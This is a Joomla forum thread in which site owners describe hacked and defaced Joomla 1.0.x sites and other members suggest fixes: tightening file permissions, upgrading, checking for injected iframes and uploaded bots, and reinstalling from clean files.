Joomla! Discussion Forums

Hannes wrote up an excellent thread about the steps to take if you have the unfortunate luck to have a hacked website. The thread can be found here.

The text isn't set in stone, if there is certain information that might be useful, please do it here so he can update it.

Some great information here, i've bookmarked it! heh.

My site was running fine and then this happenend after 1 week: http://joram.biz/ I've waited and its not going away.
My Hosting server is fine because other site that are not running on Joomla are perfect

The only third party component was loudbot/loudblog

Thanks

This means that Joomla can't connect to your database. (I think, I don't know all the number codes of the head... You see the number 2 below the offline message? Thats the information whats wrong.)

Thanx for the info.
I tried repairing the DB and nothing changed, instead I made a new installation. 

Hi

I am experiencing the samething...with the #2 below the " wwws.org
This site is temporarily unavailable.
Please notify the System Administrator
2

What is it?

It happened twice now. It came back this afternoon and 5 hours later it did the samething again.

What I was doing the first time is that I was updating my Sitemap going to Googles homepage and I click on the Joomap? When the site went back on this afternoon I went and updated my Sitemap again as I din't think it was the one that is wrong with it, then later after that the site became sluggish and sure enough it went offline again with that message.

Can anyone figure what is wrong?

Thanks!

Well, this was a no-brainer after all. I was hacked After reinstalling and bring the site back, about 8 hours in operation again...Poof! Site no more all files are deleted by the hacker.

The message with the number 2 means that there are issues connecting to the database.  Could it be that your hosting service is deleting your files? 

Greetings all,

I am using Joomla 1.0.8 and I have several mods that have been added, I have a person who has now attacked my site 2 times, and at present this person is envoking a "javascript>document.write(unescape" command that has been encoded. I am unable to decode this script to find out where its at.

I have passworded my Admin folder and I am presently seeking advice to plug this hole once and for all. Can anyone tell me how this person is adding Java scripts to my webpage???

This person first did this to my Opening page which was a Simple HTML click to proceed to the Joomla side. I don't know how this person is making changes successfuly to my site, but I would like to plug this hole ASAP!

I like Joomla, But I can't afford to have people editing my website at there will.

I will not post links as I don't want people to get any viruses, but I will post the scrip in CODE to show the exact nature of this embeded code.



Please help me to find out how this person is changing my website at his will, or tell me what CHMOD setting I should change my subfolders too resolve this problem.

I am very concerned about this, and If I can't resolve this issue. I will be forced to remove Joomla, which I don't want to do.
Many thanks in advance if you have any advise on this problem please let me know.

Can you block their IP?  Do you know who this person is?

No I do not know the actual person, but the only odd connection is comming from Italy. Its an ADSL connetion with a dynamic IP address.

This person is adding lines of code to my index.php and they are embedding encoded scripts into the page. All of the Internet explorer people are getting hit with Windows installers. Everyone who uses Firefox is not getting trampled.

I want to nix this hole, I have many files set to write able as per the install instructions. But this is really getting anyoing. is there some sort of FTP software embeded into the Joomla system?

Many thanks
Blacksteel

Is your configuration.php locked down?  Can you list the mods you have installed?

My configuration is listed as Writeable - I thought that was supposed to be set to that. ( I don't have access to an FTP to make that change from work)

I have the following moduals installed:

DOCMan v1.3.0 beta 4
Events  v1.1
Joomlaboard Forum v1.1.2 Stable

And thats it.

You configuration should only be writable when you are changing something in the global configuration.  All other times it should be chmod 644.

That may be your issue right there.

Ok, many thanks I will look into this.

However this issue is the 2nd attack. My first attack was done on an HTML (only splash screen) that was not appart of Joomla. Does this suggest to you that the FTP site was attacked or does joomla have a way to edit HTML too??

I know its the same person the javascript is the same as before. So how is this person changing my HTML and have access to my configuration.php??

Many thanks for your help BTW!

Blacksteel

Have you talked to your hosting provider?  Perhaps the issue lies with a server vulnerability rather than your specific site.

I am already on that now.. Many thanks for your suggestions MMMedia!

I hope I can get this thing plugged up. It looks like I need to re-read the install FAQ..

Blacksteel

I am on a shared server.  What I find VERY odd is that the installation of Joomla went well and all dirs are owned by my account.
But I look in the templates directory.... The last template is owned by user nobody and the dir is 777 and files are 666.

I then look in the components directory.  GigCal, joomlaboard and xemusicgal are also owned by nobody, dir 777, files 666.. all others are owned by my account.

I had to get my host admin to change the xemusicgal ownership to me recursively so I could ftp large mp3 files manually.
After that, the xemusicgal component through the admin interface could not upload smaller mp3 files because it wants to write files as user nobody.  I ended up changing the perms to 777 for that directory as a result.


Is there anyway to configure joomla to create dirs and files with a specific owner?  I know there is a umask option inside the global config.  I may have messed up when I changed those umasks to 0777 and 0666.  But that still doesn't explain why the new components and template is owned by user nobody.


UPDATE...
I just changed the global config to use the server defaults for permissions.  I then changed the dir ownership to 755 and tried to upload a file using the xemusicgal admin interface.  Of course it says my file was uploaded successfully... poorly written I guess.
I check the mp3 dir and nothing is there.  I then change the dir perms to 777, reupload and look again....

-rw-r--r--  1 nobody  users    25133 Jun  5 22:17 comm01.mp3

ARRRGH ---- friggin nobody.  Good thing I can delete the file since I own the directory.

This is annoying.  someone smack me with a knowledge fish (or large trout for you old mIRC users).

What kind of hack is this? And how do you think it can be fixed?
http://www.neo-fantasy.com

if that your site.. you are defaced. delete it.. and have a fresh reinstall of Joomla. also inform the admin of the server.

you don't need to delete and install fresh joomla if your site defaced
its not a good idea to  advise to delete site to anybody if the site defaced.

it's easy to fix defaced site

you may have to check your template index.php, reload a fresh root index.php and index2.php, check that configuration.php is OK.
check chmods.. make sure you upgrade to joomla 1010
check all folders for pearl scrip. they upload BOTS and use your site for ddos attacks in the future with that bot
you need to find that script in folders... check cache folder too

check iframe call in the administration html files
there are many different ways of hacking. hard to find what they did
usually they don't harm the site. they delete admin account. you need to go to phpmyadmin and create a new one.
check security forum and unistall or upgrade or fix komponents that hackers getting to your site

go to this site.... all the components and modules compromised in that list
http://forum.joomla.org/index.php/board,296.0.html

maybe mods should write a list of what to check in hacked sites.

if your site defaced.... on your main page in IE go to VIEW>>>SOURCE
check the source and you will see the IFRAME codes that hacker used.
that codes gives you a lot of idea how to fix your site


You also need to make sure your files do not allow direct access, so check that you have included this at the top of each file:

Thats true bullshit. The hackers could have left some fíle somewhere deep in the folders of Joomla and you wouldn't notice it. They would be back in in a second. The only REALLY secure way to get rid of a hacker is to delete both the files and the db of Joomla and restore it from scratch. Of course you create a backup of all the stuff, to copy database entries or modified files after checking them back into the production system. But advising someone to NOT remove all files is like advising someone to not fix the brakes on a car after they got wrecked in an accident.

yes.. its possible that some kind of backdoors deep in your joomla files.. thats why i suggest a fresh files of joomla 1.0.10 .

i have some irregularities on my some joomla sites ...good thing i have a DB backup.. so i will just restore the DB and upload fresh joomla 1.0.10 files. though some of my sites not yet fix .. too busy with school stuffs. maintaining many joomla sites kinda painfull if theres a security issue. 

some hackers deface site and do not touch database (inexperience lamers)
if database is clean, you can fix the site. joomla keeps data in mysql
if hacker modified database and you do not have a database backup, damage is done and you can't fix the site.(if you do not have a database backup)

but if site defaced and database is not harmed, try ftp voyager.
FTP VOYAGER allows you to compare a known good configuration with your current one to see if there are any files/directories that have been added to your system. FTP Voyager which allows you to do a diff between a site and a local copy to see what's diff.
this way you can find hidden files that added to you folders by hackers.
You should also inspect your logs, look for strange request or search for strings like "/tmp" "/var/tmp" which is usually used to upload and execute rootkits, perl scripts.(copy and pasted from a prior post)

Strange, another fix today on a 1.0.8 site.  I figured everyone would have done an update by now.  Hmmm, well none the less, I think the reason I've been able to track for the site hacks is not as deliberate as many would think. 

In fact I'm almost willing to promise that a majority of sites being hacked are taking advantage of issues on cPanel type servers via a "BOT" after looking at the hosting sites on our servers that have Joomla we notice that the same bot seems to tread the IP number and or domains at almost the same time and the one that got nailed was an older install of Joomla.

None the less, until cPanel looks at the issue I've published a rather simple tutorial on how to somewhat shield your self from these BOT type attacks.

http://forum.joomla.org/index.php/topic,11244.30.html



~ Jared

sadly, my site was hacked/defaced/whatever this morning. bizarre world political crap statements with their tags on a changed index.php and index2.php files somehow. i was on 1.0.10 and found out and uploaded to 1.0.11 after wards. everything seems fine now, its not a critical site so if it goes down again by hackers, i dont really give a crap but its more annoying than anything. and it does raise questions as to whether i should use joomla for other clients.... i read the securities thread and it makes my head hurt reading it.

my hosting company said it was joomla being vulnerable and it wasnt the server so not to worry... although makes me worry about joomla more than anything. still trying to figure out how to view my access logs to see where it might of happened. hopefully 1.0.11 is all good and this was just a political stunt.

looking at hte logs, it seemed to attack the com_comprofiler. seems it was community builder./

Hello all,

This is now the 3rd site to be hacked in the last few days.

All running off of the same hosting platform.

Please help if you are knowledgeable and especially if you are part of the Joomla team

first site as proof of hack:

http://www.waldorff.no/
there is now an index.html file that shows the hack crap which was not there before obviously.

http://www.waldorff.no/index.php = comes up with all sorts of errors because they also hacked configuration.php

finally they added this cute file: [cute is a VERY relative word]

http://www.waldorff.no/tema.php

Guvenlik Durumu - from the little research that I have made this would mean: Security Condition.

Please check this out.

I have converted most of my customers to Joomla and if this is going to happen to all of them, this is really NOT good for me.


Thank you for your help in advance.

Sincerely,

Emmanuel Lemor

Additional information:
Joomla v1.0.11

running:
PHP/4.4.2

uname -a: FreeBSD speedy.dnsprotect.com 4.9-RELEASE FreeBSD 4.9-RELEASE #1: Thu Feb i386

shared hosting with lypha.com

honestly never checked to see if I have access to the server logs. asking hosting provider hopefully will have acces to them.

so far no information from them except they say the server has not been compromised.

folder permissions are in the only way that I could set them with this provider which is 777 for folders, if I have them set to 755
then joomla install considers them non-writeable.

[I am sure this is part of the issue but the hosting provider won't do anythign to change it], BUT the only file that gets defaced
is the index.php and that does not have 777 rights of course, so I have a hard time believing that it is the fault of the folders having
777 rights...

Thanks for the help.
Sincerely,

Emmanuel Lemor.

More additional information is needed. Which Modules/Components are installed. Do you have register globals enabled or the register globals emulation?

Is you configuration.php is writeable?

Have you read the security checklist? http://forum.joomla.org/index.php/topic,81058.0.html
Do you use .htaccess to block exploit attempts? http://forum.joomla.org/index.php/topic,75376.0.html
Have you looked if your installed Modules/Components are up to date? Here is a list of vulnerable Components http://forum.joomla.org/index.php/topic,79477.0.html

Greets

Jens